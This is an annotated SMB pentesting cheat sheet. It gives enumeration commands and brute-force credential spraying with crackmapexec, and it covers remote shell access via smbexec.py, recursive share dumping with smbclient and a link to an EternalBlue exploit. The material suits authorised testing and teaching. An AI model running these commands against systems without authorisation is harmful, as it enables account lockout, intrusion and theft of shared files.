
139,445 - Pentesting smb

SMB (Server Message Block) is the network protocol Windows uses for file and printer sharing, among other things. Port 139 carries SMB over NetBIOS session service; port 445 carries SMB directly over TCP, which is what modern hosts use. SMB was introduced in the 1980s and has evolved since: SMB 2 and 3 replaced SMBv1, which lacks signing/encryption protections and is disabled by default on current Windows — finding SMBv1 enabled is itself a finding worth reporting.

SMB allows client computers to access resources (such as files and printers) on a server as if they were part of the same network, regardless of their physical location. SMB supports many operations, including reading and writing files, requesting print jobs, and managing shared resources such as directories and printers.

nmap


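# Quick service/version pass on the two SMB ports. Quote "$IP" so an empty or
# malformed variable does not silently turn into a scan of nothing.
# -A = OS detection + version + default scripts + traceroute; OS detection
# needs raw sockets, which is why sudo is required.
sudo nmap -p 139,445 -A "$IP"
# -Pn skips host discovery: use it when ICMP/ping is filtered and nmap would
# otherwise report the host as down and scan nothing.
sudo nmap -p 139,445 -sC -sV -Pn -vv "$IP"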

nmap script

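# List the bundled SMB NSE scripts before picking one:
# ls /usr/share/nmap/scripts/*smb*
#
# Quote the wildcard: unquoted, the shell may expand smb-vuln-* against the
# current directory instead of handing the pattern to nmap.
# NOTE: some smb-vuln-* scripts are in the "dos" category and can crash the
# target (e.g. smb-vuln-ms10-054). Against anything you cannot afford to take
# down, use --script="smb-vuln-* and not dos" instead.
sudo nmap -p 139,445 --script="smb-vuln-*" "$IP"
sudo nmap -p 139,445 --script=smb-enum-users.nse "$IP"
sudo nmap -p 139,445 --script=smb-enum-shares.nse "$IP"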

rpcclient


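# Null-session MS-RPC: -U "" is an empty username, -N suppresses the password
# prompt. Success here means anonymous RPC access is allowed (a finding on its
# own). Useful subcommands once connected: srvinfo, enumdomusers, querydominfo.
rpcclient -U "" -N "$IP"
# check wireshark if you want to see smb version like Samba 2.2.7a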

nbtscan


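# NetBIOS name sweep of the target's /24. -r sends from local UDP port 137
# (which needs root, hence sudo); some Windows hosts only answer queries that
# originate from port 137.
sudo nbtscan -r "$IP/24"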

enum4linux


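# -a = do everything (users, shares, groups, password policy, OS info).
# Runs as a null session unless -u/-p are given; the 'guest' variant helps on
# hosts that reject null sessions but still allow the guest account.
enum4linux -a "$IP"
enum4linux -a -u 'guest' "$IP"
# $URL here is just a hostname placeholder; enum4linux takes an IP or hostname,
# not an http:// URL.
enum4linux -a -u 'guest' "$URL"
# NOTE(review): "enum4linux2" is not a standard package name — the maintained
# rewrite is usually installed as enum4linux-ng; confirm which binary you have.
enum4linux2 "$IP"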

crackmapexec


crackmapexec - bruteforce

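# Password spraying / brute force. Passing a file to both -u and -p tries every
# user against EVERY line (full cross product). If the domain has a lockout
# threshold this will lock accounts out — check `--pass-pol` first and keep
# attempts per user below the threshold. --continue-on-success keeps going
# after the first valid pair instead of stopping.
crackmapexec smb "$IP" -u user.txt -p user.txt --shares --continue-on-success
# Safer variant: pair the files line by line (user1/pass1, user2/pass2, ...)
# instead of the cross product.
crackmapexec smb "$IP" -u user.txt -p pass.txt --no-bruteforce --shares --continue-on-success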

crackmapexec - enumeration with guest user (no password)

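# Unauthenticated enumeration. Try the null session ('' / '') first, then the
# built-in guest account with an empty password; one of the two is often
# enough on misconfigured hosts.
crackmapexec smb "$IP" -u '' -p '' --shares
crackmapexec smb "$IP" -u 'guest' -p '' --shares

# Domain/host enumeration through the same guest session. --rid-brute walks
# RIDs via LSA to recover usernames even when user listing is denied;
# --pass-pol shows the lockout policy you need before any spraying.
crackmapexec smb "$IP" -u 'guest' -p '' --users
crackmapexec smb "$IP" -u 'guest' -p '' --groups
crackmapexec smb "$IP" -u 'guest' -p '' --local-groups
crackmapexec smb "$IP" -u 'guest' -p '' --loggedon-users
crackmapexec smb "$IP" -u 'guest' -p '' --rid-brute
crackmapexec smb "$IP" -u 'guest' -p '' --sessions
crackmapexec smb "$IP" -u 'guest' -p '' --pass-pol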

smbexec.py


target: windows

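# Semi-interactive shell over SMB (Windows targets). Quote the whole target
# string: a password containing shell metacharacters ($ ! ; &) breaks an
# unquoted $USER:$PASS@$IP. The password still ends up in shell history and
# `ps` output — omit ":$PASS" to be prompted, or use -hashes LM:NT for
# pass-the-hash instead of a cleartext password.
# smbexec works by creating a temporary service on the target, so it is noisy
# (service-installation events on the host); pick it only when stealth does
# not matter.
/opt/tools/impacket/examples/smbexec.py "$USER:$PASS@$IP"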

smbmap


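# Share listing with effective permissions (READ/WRITE per share) — quicker
# than smbclient for a first look. Anonymous/null first, then real creds.
smbmap -H "$IP" -u anonymous
# Cleartext password on the command line: it lands in shell history and is
# visible to other local users via ps for the duration of the run.
smbmap -H "$IP" -d "$DOMAIN" -u "$USER" -p "$PASS"
# -R recurses into every readable share to list files (slow on big shares).
smbmap -H "$IP" -d "$DOMAIN" -u "$USER" -p "$PASS" -R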

smbclient


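# Interactive share access. The share can be written as //host/share (forward
# slashes, no special quoting needed) or as \\host\share — the latter must be
# quoted so the shell does not eat the backslashes. -N suppresses the password
# prompt, which is what you want for null/guest sessions; without it smbclient
# will stop and ask.
smbclient "//$IP/tmp" -U ''
smbclient "//$IP/msfadmin" -U 'msfadmin'
smbclient "//$IP/Enterprise-Share" --user="$USER" --password="$PASS"
smbclient "\\\\$IP\\Enterprise-Share" --user="$USER" --password="$PASS"

# Literal examples (placeholder host and credentials, replace before use).
# Note --password puts the secret into shell history and ps output.
smbclient '\\11.22.33.44\shares' --user='admin' --password='123456'
smbclient '\\11.22.33.44\shares' --no-pass
smbclient '\\11.22.33.44\shares' -U 'guest' -N
smbclient '\\11.22.33.44\shares' -U 'guest'
smbclient '\\11.22.33.44\shares\'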

smbclient - get folder

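# Pull a whole share (or a subfolder of it) non-interactively.
#   prompt OFF  - do not ask per file
#   recurse ON  - descend into subdirectories
#   mget *      - fetch everything under the current remote directory
# Files are written to the local working directory unless `lcd` is used, and
# `lcd` needs the target directory to already exist — mkdir -p it first.
# Check free disk space before dumping a large share.
smbclient '\\11.22.33.44\[share]' -U 'guest' -N -c 'prompt OFF;recurse ON;  mget *'
smbclient '\\11.22.33.44\[share]' -U 'guest' -c 'prompt OFF;recurse ON;  mget *'
# Pull one subfolder into a matching local directory:
mkdir -p /home/kali/workspace/gatekeeper/smb_dump/Share/ /home/kali/workspace/gatekeeper/smb_dump/Default/
smbclient '\\11.22.33.44\[share]' -N -c 'prompt OFF;recurse ON;cd "Share\"; lcd "/home/kali/workspace/gatekeeper/smb_dump/Share/"; mget *'
smbclient '\\11.22.33.44\[share]' -N -c 'prompt OFF;recurse ON;cd "Profile\"; lcd "/home/kali/workspace/gatekeeper/smb_dump/Default/"; mget *'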

smbget


# smbget takes smb:// URLs and behaves like a recursive downloader:
# --recursive (-R) fetches a whole share/directory tree, a file URL fetches
# just that file. Output lands in the current working directory.
smbget --recursive 'smb://11.22.33.44/anonymous/'
smbget --recursive 'smb://11.22.33.44/Users/desktop.ini'

exploits


  • https://github.com/3ndG4me/AutoBlue-MS17-010 — MS17-010 (EternalBlue, SMBv1). Confirm the host is actually vulnerable with `nmap --script smb-vuln-ms17-010` before firing it: the exploit targets kernel memory and a failed attempt can blue-screen the host.